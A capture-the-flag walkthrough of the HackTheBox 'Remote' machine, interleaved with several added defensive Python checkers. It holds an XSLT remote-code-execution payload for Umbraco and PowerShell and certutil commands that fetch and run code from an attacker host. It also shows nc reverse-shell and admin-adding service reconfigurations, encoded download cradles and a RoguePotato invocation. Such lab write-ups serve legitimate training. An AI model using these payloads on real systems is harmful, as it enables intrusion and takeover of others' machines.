# HackTheBox - Remote

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZhTHEIVG5KO0fn3hVb%2F-MZhTKIsXlpEa_vCZzkK%2Fimage.png?alt=media\&token=9d7ba40b-780f-4575-9dd5-ea320ad1a279)

### Nmap scan results

```bash
nmap -p- -A -T4 -oA nmap-remote 10.10.10.180
```

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZh-urBTHlX-MYDLXaW%2F-MZh0N2uUcF_eBekWovC%2Fimage.png?alt=media\&token=80ad890d-6afd-4451-9376-b81922089c5f)

Let's enumerate the FTP server and see if we can get any **`sensitive/conf`** files.

![Epic Fail](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZh-urBTHlX-MYDLXaW%2F-MZh1JmGexTt69t7Vw_Q%2Fimage.png?alt=media\&token=369df511-f886-49bf-884a-c0277b4a7f6b)

### Enumerating webserver (Microsoft HTTPAPI)

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZh-urBTHlX-MYDLXaW%2F-MZh1ysxI0ecwJX-onBL%2Fimage.png?alt=media\&token=f6561be5-419e-4396-94d8-535440c1b1fd)

There is an [Umbraco](https://umbraco.com/) CMS (Content Management System) running. We can search for potential exploits, but first we will run a gobuster scan in the background.

> Umbraco is an open-source content management system platform for publishing content on the World Wide Web and intranets. It is written in C# and deployed on Microsoft based infrastructure.

```bash
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.180/ -o gob-dir-scan.out -t 50
```

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZh-urBTHlX-MYDLXaW%2F-MZh2W5lioJwhkUVgSON%2Fimage.png?alt=media\&token=2de637b5-0536-4932-bd72-5a3843ec382b)

**There are certain exploits available for this CMS, but we need to enumerate the version used.**

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZh-urBTHlX-MYDLXaW%2F-MZh2k_dXsvnzir8SB0L%2Fimage.png?alt=media\&token=0ddb3fa9-0858-454e-b473-8ae3495d00d4)

### Mounting the [NFS](https://www.datto.com/blog/what-is-nfs-file-share) Share

{% hint style="info" %}
**NFS**, or Network File System, is a file-sharing system developed by Sun Microsystems in the early 80s that allows users to view, store, update or **share** files on a remote computer as though it were a local one.
{% endhint %}

```bash
mount -t nfs 10.10.10.180:/site_backups /mnt/backups -o nolock
```

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZh-urBTHlX-MYDLXaW%2F-MZh3Q2_gEbUW27tOXdW%2Fimage.png?alt=media\&token=1e9457b7-afe9-4f2e-b0de-1bc1d894ad25)

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZh-urBTHlX-MYDLXaW%2F-MZh3apHzxec_nQUnaNw%2Fimage.png?alt=media\&token=a9f65902-9059-465d-8531-3d03ab222627)

So the Umbraco CMS configuration is stored in the **`Umbraco.sdf`** file, which contains the usernames and password hashes. The file is located at **`App_data/Umbraco.sdf`**.

I actually ran **strings** on the Umbraco.sdf file to get the credentials for admin. We will also need to verify the version used; check the **`Web.config`** file.

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZh-urBTHlX-MYDLXaW%2F-MZh99f8lwPG6UbrRFct%2Fimage.png?alt=media\&token=5906424e-08d5-434b-a549-9f749eb51e85)

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZh-urBTHlX-MYDLXaW%2F-MZh4l_1WKnAEyjbDUUE%2Fimage.png?alt=media\&token=d5b9c1c4-5a8d-40d2-a3a9-5f9747981327)

Get the SHA-1 hash for admin and crack it using **John** or **hashcat**.

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZh-urBTHlX-MYDLXaW%2F-MZh59pKLRxa9i0Hc9g9%2Fimage.png?alt=media\&token=cb2591f4-1ee8-4008-81ae-1ebae3cc0ce5)

Now that we have credentials, we can try the **`(Authenticated) Remote Code Execution`** exploit.

### Exploiting Umbraco's RCE (Authenticated)

This is the vulnerable page at **`http://10.10.10.180/umbraco/developer/Xslt/xsltVisualize.aspx`**. The XSLT visualizer compiles any `msxsl:script` block in the submitted stylesheet, so a C# script that starts a process runs on the server:

```xml
<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">
  <msxsl:script language="C#" implements-prefix="csharp_user">
    public string xml()
    {
        string cmd = "<cmd-arguments>";
        System.Diagnostics.Process proc = new System.Diagnostics.Process();
        proc.StartInfo.FileName = "<cmd>";
        proc.StartInfo.Arguments = cmd;
        proc.StartInfo.UseShellExecute = false;
        proc.StartInfo.RedirectStandardOutput = true;
        proc.Start();
        string output = proc.StandardOutput.ReadToEnd();
        return output;
    }
  </msxsl:script>
  <xsl:template match="/">
    <xsl:value-of select="csharp_user:xml()"/>
  </xsl:template>
</xsl:stylesheet>
```
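The defensive counterpart to the payload above, as an added example that is not part of the original writeup: a pre-check that parses a user-supplied stylesheet and refuses anything carrying an `msxsl:script` block or a script body that touches process, file or network APIs. The two sample stylesheets are constructed (the payload one with the placeholders filled in); the function names are my own.

```python
import xml.etree.ElementTree as ET

# Namespace of the inline-script extension the XSLT visualizer compiles.
MSXSL_NS = "urn:schemas-microsoft-com:xslt"
# .NET APIs inside a script body that mean process, file or network access.
DANGEROUS_API = ("System.Diagnostics.Process", "System.IO.", "System.Net.", "System.Reflection.")


def audit_xslt(xslt_text: str) -> list:
    """Return findings for a user-supplied stylesheet; an empty list means no embedded script."""
    try:
        root = ET.fromstring(xslt_text)
    except ET.ParseError as exc:
        # Reject outright: never hand an unparseable stylesheet to the transform engine.
        return [f"unparseable XSLT: {exc}"]
    findings = []
    for elem in root.iter(f"{{{MSXSL_NS}}}script"):
        language = elem.get("language", "JScript")  # msxsl default when omitted
        prefix = elem.get("implements-prefix", "?")
        findings.append(f"msxsl:script block (language={language}, prefix={prefix})")
        body = elem.text or ""
        findings += [f"script body references {api}" for api in DANGEROUS_API if api in body]
    return findings


# Constructed sample modelled on the payload above, with the placeholders filled in.
PAYLOAD_XSLT = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">
  <msxsl:script language="C#" implements-prefix="csharp_user">
    public string xml() {
        System.Diagnostics.Process proc = new System.Diagnostics.Process();
        proc.StartInfo.FileName = "cmd.exe"; proc.StartInfo.Arguments = "/c whoami";
        proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true;
        proc.Start(); return proc.StandardOutput.ReadToEnd();
    }
  </msxsl:script>
  <xsl:template match="/"><xsl:value-of select="csharp_user:xml()"/></xsl:template>
</xsl:stylesheet>"""

# Constructed sample of an ordinary stylesheet that should pass.
BENIGN_XSLT = """<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/"><xsl:value-of select="/page/title"/></xsl:template>
</xsl:stylesheet>"""

if __name__ == "__main__":
    for name, doc in (("payload", PAYLOAD_XSLT), ("benign", BENIGN_XSLT)):
        print(name, audit_xslt(doc) or ["clean"])
```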

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZh-urBTHlX-MYDLXaW%2F-MZh7TBq6JuDp_ax8BYO%2Fimage.png?alt=media\&token=fcb28c24-4e3a-4818-a252-2ebe0e308aad)

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZh-urBTHlX-MYDLXaW%2F-MZh7VJlvwtGw_YUNL6K%2Fimage.png?alt=media\&token=4073688c-5b85-4057-a0bc-0188579dd726)

### Using [nishang's](https://github.com/samratashok/nishang/tree/master/Shells) PowerShell script to get a reverse shell

```bash
python3 exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180/ -c powershell -a "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5:8000/shell.ps1')"
```

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZh-urBTHlX-MYDLXaW%2F-MZhAN6VV4eJZYDPxujw%2Fimage.png?alt=media\&token=4af5faa7-8696-409a-bf10-9c42725b17ba)

### Running winpeas.exe (Privilege Escalation)

```powershell
certutil.exe -urlcache -f http://10.10.14.5:8000/winpeas.exe winpeas.exe
```

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZh-urBTHlX-MYDLXaW%2F-MZhEYeMI6ZBNn6CFhea%2Fimage.png?alt=media\&token=6bc3c67c-0739-4dc7-ab8c-460581bf78eb)

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZh-urBTHlX-MYDLXaW%2F-MZhEQBriAn-Tg7uHZfp%2Fimage.png?alt=media\&token=991ea165-1372-44b0-be07-626f6126f2b7)

> If the group "Authenticated users" has **SERVICE\_ALL\_ACCESS** in a service, then it can modify the binary that is being executed by the service. To modify it and execute **nc** you can do:

{% embed url="https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services" %}

```cmd
sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd /c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"

sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"
```
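The condition in the quoted paragraph (a broad group holding change-config rights on a service) can be audited from the SDDL that `sc sdshow <service>` prints. The checker below is an added example, not code from the writeup or from winPEAS; the two SDDL strings are constructed to show a default-looking DACL next to one that grants Authenticated Users SERVICE_ALL_ACCESS, and are not copied from the target.

```python
import re

# Service rights that let the holder change what the service runs, or rewrite its ACL.
# SDDL two-letter token -> (name, numeric bit as seen when sc sdshow prints a hex mask).
TAKEOVER_RIGHTS = {
    "DC": ("SERVICE_CHANGE_CONFIG", 0x2),
    "WD": ("WRITE_DAC", 0x40000),
    "WO": ("WRITE_OWNER", 0x80000),
    "GA": ("GENERIC_ALL", 0x10000000),
}
# Well-known SID strings that mean "any low-privileged user on the box".
BROAD_PRINCIPALS = {"AU": "Authenticated Users", "WD": "Everyone", "BU": "Users", "IU": "Interactive"}
ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_dacl(sddl: str) -> list:
    """Split the DACL part of an sc sdshow string into ACE dicts; the SACL after 'S:' is ignored."""
    aces = []
    for ace in ACE_RE.findall(sddl.split("S:")[0]):
        fields = ace.split(";")
        if len(fields) != 6:  # ace_type;flags;rights;object_guid;inherit_guid;sid
            continue
        ace_type, _flags, rights, _obj, _inh, sid = fields
        if rights.lower().startswith("0x"):  # numeric mask instead of letter pairs
            mask = int(rights, 16)
            tokens = {tok for tok, (_, bit) in TAKEOVER_RIGHTS.items() if mask & bit}
        else:
            tokens = {rights[i:i + 2] for i in range(0, len(rights), 2)}
        aces.append({"type": ace_type, "rights": tokens, "sid": sid})
    return aces


def weak_service_aces(service: str, sddl: str) -> list:
    """Report allow-ACEs that give a broad principal control over the service's binary path."""
    findings = []
    for ace in parse_dacl(sddl):
        if ace["type"] != "A" or ace["sid"] not in BROAD_PRINCIPALS:
            continue
        granted = sorted(ace["rights"] & set(TAKEOVER_RIGHTS))
        if granted:
            names = ", ".join(TAKEOVER_RIGHTS[r][0] for r in granted)
            findings.append(f"{service}: {BROAD_PRINCIPALS[ace['sid']]} has {names}")
    return findings


# Constructed samples (not copied from the target): a default-looking DACL and one granting
# Authenticated Users SERVICE_ALL_ACCESS, the condition described in the quoted paragraph.
HARDENED_SDDL = "D:(A;;CCLCSWRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
WEAK_SDDL = ("D:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")

if __name__ == "__main__":
    for svc, sddl in (("HardenedSvc", HARDENED_SDDL), ("WeakSvc", WEAK_SDDL)):
        print(svc, weak_service_aces(svc, sddl) or ["no broad takeover rights"])
```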

```bash
echo "Iex(New-Object Net.WebClient).downloadString('http://10.10.14.5:8000/shell.ps1')" | iconv -t utf-16le | base64 -w 0
```

```powershell
sc.exe config UsoSvc binpath= "cmd.exe /c powershell.exe -EncodedCommand SQBlAHgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADUAOgA4ADAAMAAwAC8AcwBoAGUAbABsAC4AcABzADEAJwApAAoA"
sc.exe start usosvc
```
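The `iconv -t utf-16le | base64 -w 0` pipeline above is the inverse of what a responder does when this service reconfiguration shows up in a process-creation log. As an added example, not code from the writeup, the decoder below pulls the `-EncodedCommand` value out of a command line, turns it back into text and flags download-cradle markers; the sample command line is constructed from the `sc.exe config` line above and the function names are my own.

```python
import base64
import re

# A PowerShell -EncodedCommand value is base64 over UTF-16LE text, which is exactly what
# `iconv -t utf-16le | base64 -w 0` produces.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Download-cradle markers worth alerting on once the text is readable.
CRADLE_MARKERS = ("net.webclient", "downloadstring", "iex", "invoke-expression", "http://", "https://")


def decode_encoded_command(blob: str) -> str:
    """Decode one -EncodedCommand blob; whitespace from line-wrapped logs is tolerated."""
    raw = base64.b64decode(re.sub(r"\s+", "", blob), validate=True)
    return raw.decode("utf-16-le")


def analyse_command_line(cmdline: str) -> dict:
    """Find an encoded PowerShell command in a process or service command line and decode it."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return {"encoded": False, "decoded": None, "markers": []}
    decoded = decode_encoded_command(match.group(1))
    lowered = decoded.lower()
    return {"encoded": True, "decoded": decoded, "markers": [m for m in CRADLE_MARKERS if m in lowered]}


# Constructed sample: the UsoSvc reconfiguration from above, as it would appear in the
# command-line field of a process-creation event (Security 4688 / Sysmon Event ID 1).
SAMPLE_CMDLINE = (
    'sc.exe config UsoSvc binpath= "cmd.exe /c powershell.exe -EncodedCommand '
    'SQBlAHgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADUAOgA4ADAAMAAwAC8AcwBoAGUAbABsAC4AcABzADEAJwApAAoA"'
)

if __name__ == "__main__":
    result = analyse_command_line(SAMPLE_CMDLINE)
    print(result["decoded"].strip())
    print("download cradle markers:", result["markers"])
```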

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZh-urBTHlX-MYDLXaW%2F-MZhL_I1aeUprmmv9hnl%2Fimage.png?alt=media\&token=9e754632-7d1d-4c8e-91d8-4b051505044a)

### Trying Rogue Potato Attack

{% embed url="https://jlajara.gitlab.io/others/2020/11/22/Potatoes_Windows_Privesc.html" %}

Download the exploit from [here](https://github.com/antonioCoco/RoguePotato/releases/tag/1.0) and transfer it to the target machine using **`certutil.exe`**:

```powershell
certutil.exe -urlcache -f http://10.10.14.5:8000/RogueOxidResolver.exe RogueOxidResolver.exe
certutil.exe -urlcache -f http://10.10.14.5:8000/RoguePotato.exe RoguePotato.exe
```

The exploit doesn't work without a **CLSID**; we can get the **CLSID** for the UsoSvc service from [here](http://ohpe.it/juicy-potato/CLSID/Windows_10_Enterprise/).

> A CLSID is a globally unique identifier that identifies a COM class object. If your server or container allows linking to its embedded objects, you need to register a CLSID for each supported class of objects.

```powershell
.\RoguePotato.exe -r 10.10.14.5 -e "powershell.exe -Enc SQBlAHgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADUAOgA4ADAAMAAwAC8AcwBoAGUAbABsAC4AcABzADEAJwApAAoA" -l 9999 -c "{B91D5831-B1BD-4608-8198-D72E155020F7}"
```

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZh-urBTHlX-MYDLXaW%2F-MZhT2oSMcKgAz980cza%2Fimage.png?alt=media\&token=233cc094-5f46-4b1a-9420-31c494e88242)
